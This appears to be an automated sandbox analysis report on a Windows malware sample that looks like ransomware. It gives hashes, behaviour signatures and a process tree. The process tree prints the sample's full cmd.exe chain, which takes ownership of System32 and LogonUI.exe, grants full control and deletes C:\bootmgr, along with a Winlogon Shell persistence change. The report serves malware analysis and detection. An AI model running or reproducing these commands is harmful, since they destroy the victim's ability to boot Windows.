Analysis
-
max time kernel
0s -
max time network
113s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
29-12-2023 21:51
Behavioral task
behavioral1
Sample
04df8dd30da8b5853f48cc1ac9b695a8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
04df8dd30da8b5853f48cc1ac9b695a8.exe
Resource
win10v2004-20231215-en
General
-
Target
04df8dd30da8b5853f48cc1ac9b695a8.exe
-
Size
6.1MB
-
MD5
04df8dd30da8b5853f48cc1ac9b695a8
-
SHA1
4c02262c2fea0e99277a99dcbe28a9c370b87c39
-
SHA256
78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201
-
SHA512
3ad10c1512e316ff9d02bd5b4573298ae2f6fc8f9d56c66e2c5c4d95fe046e5b14b09e63cea9bca778560ce4b568ebdf70d66a0225b2eaf7e6cd3ba914583b7e
-
SSDEEP
3072:jnsbblTAByHNgb0nbYlwKsw962CpJid72gqV/6c4LNobbamucc3OD4iEDzyEaE0u:jnsq7hQplBdJ7bP4L8rVE
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty" 04df8dd30da8b5853f48cc1ac9b695a8.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 7 IoCs
pid Process 1084 takeown.exe 2492 takeown.exe 3380 icacls.exe 2488 takeown.exe 4064 icacls.exe 2680 takeown.exe 3900 icacls.exe -
Modifies file permissions 1 TTPs 7 IoCs
pid Process 2492 takeown.exe 3380 icacls.exe 2488 takeown.exe 4064 icacls.exe 2680 takeown.exe 3900 icacls.exe 1084 takeown.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 984 NOTEPAD.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2156 04df8dd30da8b5853f48cc1ac9b695a8.exe Token: SeDebugPrivilege 2156 04df8dd30da8b5853f48cc1ac9b695a8.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\04df8dd30da8b5853f48cc1ac9b695a8.exe"C:\Users\Admin\AppData\Local\Temp\04df8dd30da8b5853f48cc1ac9b695a8.exe"1⤵
- Modifies WinLogon for persistence
- Suspicious use of AdjustPrivilegeToken
PID:2156 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit2⤵PID:1336
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4064
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2680
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\LogonUI.exe /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3900
-
-
C:\Windows\system32\takeown.exetakeown /f C:\bootmgr3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1084
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2492
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt2⤵
- Opens file in notepad (likely ransom note)
PID:984
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit2⤵PID:1808
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /grant Admin:F1⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3380
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System321⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2488
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,UpdatePerUserSystemParameters1⤵PID:2232
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD549d826b5b43094f6fd04739c6b709ca0
SHA1a02d1ba89d7599472243279a5896139e86d754e3
SHA256e62f9094b7f46d4a59bf47a6f6099387cb73f71b9924487e73f188e26c7303d6
SHA5128a60272466f674f12ad7b63775e6f51f367d2ec80d9efce8345dfe3a44465ef476dbb334f2e7b49da5f6c32befc2bde62f94090c78df9189253474ddce4ffeb5
-
C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat
Filesize8KB
MD5ed890ebff57a837bcbee784b268a1d6d
SHA1f2bd0792ca7b275bee7c4ec0b51193e19227dfb3
SHA2561dde681e2814fb5c1babe5cddf4903462db829ce4735ea18bef0345bc0016ced
SHA5123ff5e65b3927bffdc8d940c0739a7628541d8d2a565d3daa941c1deed06b6b4a8e2fd0454d9ad96fcf48d390bdd1ffc835dba7cfea63e5838d17db03973d0b65
-
Filesize
37KB
MD5354af3836d13dc27e65beb7fe917aaff
SHA12ca4375e7161228f5d54bd94fcd6bddb83a647c4
SHA256788ecbbbf85c87889f3c2279922021247ffee188b7d89d92765c6f2104180397
SHA512b6a029ea67d731b0d565669109c0c230e20c423f873d983d5343bf1af296513cdc814a3b3726d407b1b14876b0d5448e1139ac25a92e5da46b596519a4193fc0